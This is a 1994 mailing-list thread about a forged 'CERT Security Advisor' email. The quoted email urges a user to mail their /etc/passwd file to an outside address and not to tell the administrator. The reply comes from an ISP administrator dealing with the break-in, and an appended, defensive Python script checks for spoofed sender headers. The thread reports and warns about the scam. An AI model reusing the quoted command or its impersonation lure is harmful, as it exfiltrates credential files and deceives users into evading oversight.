Re: Another request for passwords

Charles Howes (chowes@helix.net)
Sun, 23 Oct 1994 04:17:40 -0700 (PDT)

On Sun, 23 Oct 1994, Douglas R. Floyd wrote:

> I got this in the mail today (10-23).
> 
> Seems like someone is knocking on io.com now.
> 
> (The forward to paris is normal as mail gets forwarded there.)
> 
> BEGIN FUNKY MESSAGE --------
> 
> >From vanepp@sfu.ca  Sun Oct 23 00:00:56 1994
> Received: from pentagon.io.com by paris.eng.utsa.edu via SMTP
> (931110.SGI/930416.SGI.AUTO)
>         for dfloyd id AA05240; Sun, 23 Oct 94 00:00:56 -0500
> Received: from trance.helix.net
>         by pentagon.io.com (8.6.5/PERFORMIX-0.9/08-16-92)
>         id XAA24822; Sat, 22 Oct 1994 23:31:04 -0500
> From: vanepp@sfu.ca
> Received: from  (helix.net [142.231.37.2]) by trance.helix.net
> (8.6.9/Trance.helix.net 8.6.9) with SMTP id VAA07859 for
> dfloyd@pentagon.io.com; Sat, 22 Oct 1994 21:33:23 -0700
> Message-Id: <199410230433.VAA07859@trance.helix.net>
> Date: Sat, 22 Oct 1994 14:22:25
> To: dfloyd@pentagon.io.com
> Subject: Very Important
> Status: RO
> 
> Dear user,
> 
>     It is imperative that I attain your /etc/passwd file
> immediately.  It is for security reasons.  You can mail
> it to me by typing:
> 
>             mail vanepp@sfu.ca < /etc/passwd
> 
> Do not tell your system administrator.  I am
> conducting an investigation on your system.  Thank you
> 
> Your identity will be kept confidential.  I guarantee it
> 
> Thank you for your cooperation.
> 
> Peter Van Epp      Technical Systems Operations
>                    CERT Security Advisor
>                    vanepp@sfu.ca
> 
> 
> END FUNKY MESSAGE -----
> 
> I sent cert@cert.org a copy, as well as the admins at io.com.
> 
> I know this was posted earlier, but I think this is another address,
> possibly an MX record as I could not telnet or finger sfu.ca.


Hi.

Yes, someone broke into an account here at Helix, and seems to have a
grudge against one or more people.  Vanepp in particular.

Argh.  This is the third mailbomb.  I'm supposed to be in charge of
security; how do you protect against this??!?

We're using shadow passwords as of tonight, and tcp wrappers as of
last month.  The bugger keeps signing on via modem, and this is a
problem.  We can't afford caller ID.

--
Charles Howes -- chowes@helix.net
 Always tell the truth, then you make it the other bloke's problem! 
 - Sean Connery, 1971
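
[Added example, not part of either message in this thread.] The quoted headers already show what Charles confirms: the From: line claims sfu.ca, but the earliest Received: hop names only helix.net hosts. A minimal Python check for that mismatch follows; the function names are hypothetical, and the sample is the quoted header block with continuation lines re-indented so they parse as folded headers.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Headers copied from the quoted message in this thread; continuation lines
# are re-indented (an assumption about the original folding).
SAMPLE = """\
Received: from pentagon.io.com by paris.eng.utsa.edu via SMTP
 (931110.SGI/930416.SGI.AUTO)
 for dfloyd id AA05240; Sun, 23 Oct 94 00:00:56 -0500
Received: from trance.helix.net
 by pentagon.io.com (8.6.5/PERFORMIX-0.9/08-16-92)
 id XAA24822; Sat, 22 Oct 1994 23:31:04 -0500
From: vanepp@sfu.ca
Received: from  (helix.net [142.231.37.2]) by trance.helix.net
 (8.6.9/Trance.helix.net 8.6.9) with SMTP id VAA07859 for
 dfloyd@pentagon.io.com; Sat, 22 Oct 1994 21:33:23 -0700
Message-Id: <199410230433.VAA07859@trance.helix.net>
To: dfloyd@pentagon.io.com
Subject: Very Important

"""

HOST = re.compile(r"[A-Za-z][\w-]*(?:\.[\w-]+)+")   # dotted name, not a bare IP

def hop_hosts(received):
    """Return (hosts named in the 'from' clause, 'by' host) for one hop."""
    text = " ".join(received.split())               # unfold the header
    m = re.match(r"from\s+(.*?)\s*\bby\s+(\S+)", text)
    if not m:
        return [], None
    return [h.lower() for h in HOST.findall(m.group(1))], m.group(2).lower()

def origin_check(raw):
    """Compare the From: domain with the hosts on the earliest Received: hop."""
    msg = message_from_string(raw)
    claimed = parseaddr(msg["From"])[1].rpartition("@")[2].lower()
    hops = msg.get_all("Received") or []
    if not hops:
        return {"claimed_domain": claimed, "origin_hosts": [], "mismatch": None}
    from_hosts, by_host = hop_hosts(hops[-1])       # last header = earliest hop
    hosts = from_hosts + ([by_host] if by_host else [])
    in_domain = any(h == claimed or h.endswith("." + claimed) for h in hosts)
    return {"claimed_domain": claimed, "origin_hosts": hosts,
            "mismatch": not in_domain}

if __name__ == "__main__":
    print(origin_check(SAMPLE))
```

A mismatch is a lead, not proof: mail legitimately sent through a third-party relay trips the same check, and Received: lines added before the first relay you trust can themselves be forged.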